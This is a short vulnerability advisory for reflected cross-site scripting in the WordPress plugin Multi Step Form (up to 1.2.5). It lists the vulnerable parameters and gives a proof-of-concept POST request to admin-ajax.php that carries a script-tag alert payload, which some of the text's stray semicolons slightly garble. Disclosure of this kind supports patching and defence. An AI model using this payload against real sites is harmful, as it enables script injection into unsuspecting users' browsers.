Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS

WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example.

PoC

The following parameters are vulnerable in fw_send_data function: fw_data[id][1] fw_data[id][2] fw_data[id][3] fw_data[id][4] email Proof of Concept (PoC): The following POST request will cause it to display an alert in the browser when it runs: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: / Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/2018/07/10/hola-mundo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 207 Cookie: wp-settings-time-1=1531401661 Connection: close action=fw_send_email&id;=1&fw;_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw;_data%5BTest%5D%5B1%5D%5B%5D=2&fw;_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw;_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email;=3%403.com&nonce;=ba16aeb8b0